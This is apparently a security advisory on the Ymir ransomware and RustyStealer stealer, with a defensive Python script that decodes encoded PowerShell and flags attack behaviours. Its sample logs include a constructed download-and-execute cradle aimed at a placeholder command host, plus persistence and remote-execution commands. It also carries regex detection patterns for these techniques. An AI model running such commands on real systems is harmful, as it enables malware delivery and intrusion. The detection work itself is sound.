Ymir and RustyStealer Malware Duo Escalates Cyber Threat Landscape
Threat Group: Unidentified Threat Actor
Threat Type: Ransomware, Info-Stealer
Exploited Vulnerabilities: Common file encryption mechanisms, credential theft techniques
Malware Used: Ymir Ransomware, RustyStealer
Threat Score: High (8.2/10) — Due to its dual-impact functionality that combines data theft with ransomware encryption.
Last Threat Observation: November 10, 2024
Overview
A newly identified ransomware variant, dubbed Ymir, has emerged in the cyber landscape, working in tandem with RustyStealer malware to maximize damage and data exploitation. First observed in early November 2024, this pairing enables attackers to both lock down systems and exfiltrate sensitive data, posing severe risks to businesses, individuals, and public sector entities. Ymir’s encryption disrupts operations, while RustyStealer collects valuable credentials and system data, broadening the threat actor's potential for further exploitation.
Key Details
- Delivery Method: Primarily through phishing emails containing malicious links or attachments.
- Target: Organizations with sensitive data and networked environments.
- Functions:
  - Data Encryption: Ymir encrypts critical files, making them inaccessible.
  - Credential Theft: RustyStealer collects login credentials and system information.
  - Network Propagation: Ymir spreads through networked systems.
  - Persistence: Uses techniques to stay active on infected systems.
  - PowerShell Exploitation: Employs PowerShell scripts for execution, evasion, and spread.
How It Infects the System
Ymir ransomware and RustyStealer often start with phishing emails designed to trick users into clicking on malicious links or opening infected attachments, such as Office documents or PDFs. Once the file is opened, it may automatically run a script or direct the user to download the malware, allowing both Ymir and RustyStealer to install on the system.
After gaining entry, these malware families abuse PowerShell, Windows' built-in scripting and automation tool, to execute commands, download additional malware, and move laterally across the network. PowerShell is powerful, present on every Windows host, and easy to hide in normal administrative activity, which allows attackers to:
- Download and Execute Malware: PowerShell commands are used to download Ymir and RustyStealer from remote servers, making the infection "fileless" and harder to detect by antivirus tools.
- Evasion through Obfuscation: Attackers disguise PowerShell commands to bypass security tools, often encoding them in ways that make detection more challenging.
- Establish Persistence: PowerShell is used to set up scheduled tasks or registry entries, making sure the malware remains active even after a reboot.
- Spread within Networks: PowerShell’s remote capabilities allow Ymir to spread to other devices, amplifying the ransomware's impact across connected systems.
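As an added example, not part of the original advisory, the following Python triage routine shows how a defender can surface the four PowerShell behaviours listed above from process-creation command lines (Sysmon Event ID 1 or Security 4688 "Process Command Line"): it decodes -EncodedCommand payloads, which PowerShell carries as base64 over UTF-16LE, and then matches download cradles, scheduled-task persistence and remoting. The sample log lines, hostnames and paths are constructed placeholders, not indicators from this advisory.

```python
import base64
import re

# Each regex maps to one PowerShell behaviour the advisory attributes to the campaign.
INDICATORS = {
    "download_execute": re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|Net\.WebClient|Invoke-Expression|\bIEX\b", re.I),
    "persistence": re.compile(r"schtasks|Register-ScheduledTask|CurrentVersion\\Run", re.I),
    "lateral_movement": re.compile(r"Invoke-Command\b.*-ComputerName|Enter-PSSession|New-PSSession", re.I),
}
# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
ENC_FLAG = re.compile(r"\s-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)

def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand script, or None if absent or malformed."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:  # PowerShell encodes the script as UTF-16LE before base64
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def triage(cmdline):
    """Classify one process command line -> (decoded script or None, [indicator names])."""
    hits = []
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        hits.append("encoded_command")  # the encoding itself is the evasion signal
    elif ENC_FLAG.search(cmdline):
        hits.append("malformed_encoded_command")  # flag present but payload undecodable
    # Match behaviours on the decoded script when there is one, else on the plain command line.
    text = decoded if decoded is not None else cmdline
    hits.extend(name for name, rx in INDICATORS.items() if rx.search(text))
    return decoded, hits

def encode_ps(script):
    """Build a -EncodedCommand argument (UTF-16LE, base64); used only to construct samples."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

# Constructed "Process Command Line" values. Hosts and paths are placeholders, not real IoCs.
SAMPLE_LOGS = [
    "powershell.exe -nop -w hidden -enc " + encode_ps("IEX (New-Object Net.WebClient).DownloadString('http://c2.example.invalid/stage.ps1')"),
    "powershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\nightly-backup.ps1",  # benign admin job
    "powershell.exe -e " + encode_ps("schtasks /create /tn Updater /tr C:\\Users\\Public\\u.ps1 /sc onlogon"),
    "powershell.exe -enc " + encode_ps("Invoke-Command -ComputerName FILESRV01 -ScriptBlock { Start-Process C:\\Users\\Public\\u.exe }"),
    "powershell.exe -enc QUJDREVGR0hJSktMTU5PUA",  # truncated payload: bad base64 padding
]

def scan(lines=SAMPLE_LOGS):  # records that raised at least one indicator
    return [(line, triage(line)[1]) for line in lines if triage(line)[1]]
```

Feeding real command lines from your endpoint telemetry into `scan` gives a first-pass worklist; the benign `-File` job shows why the encoding flag, not PowerShell itself, is the signal worth alerting on.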
Attack Vectors
The Ymir and RustyStealer malware combination primarily infiltrates networks through phishing emails with malicious attachments or links. Upon activation, RustyStealer immediately begins gathering sensitive data, such as login credentials and system details. Once this data is extracted, Ymir ransomware initiates file encryption, rendering local data inaccessible. The dual malware setup allows attackers to leverage both immediate and long-term threats, from credential compromise to prolonged operational downtime.
Known Indicators of Compromise (IoCs)
Mitigation and Prevention
- User Awareness: Conduct phishing awareness training to reduce click-through rates on malicious links.
- Email Filtering: Implement email filtering tools to block emails with suspicious attachments and URLs.
- Antivirus Protection: Update antivirus solutions and endpoint protection systems to recognize and respond to Ymir and RustyStealer.
- Two-Factor Authentication (2FA): Enforce 2FA on all systems to mitigate credential theft.
- Monitor Logs: Regularly review network and endpoint logs to identify unusual access or data transfer activity.
- Regular Updates: Ensure that all systems, including antivirus definitions, are up to date to protect against known vulnerabilities and threat signatures.
Conclusion
The Ymir and RustyStealer malware combination represents a significant threat due to its dual capabilities of data encryption and credential theft. Organizations are advised to implement strong access controls, user awareness training, and to stay vigilant with log monitoring and regular updates. Early detection and robust email filtering are key to minimizing the risk of compromise.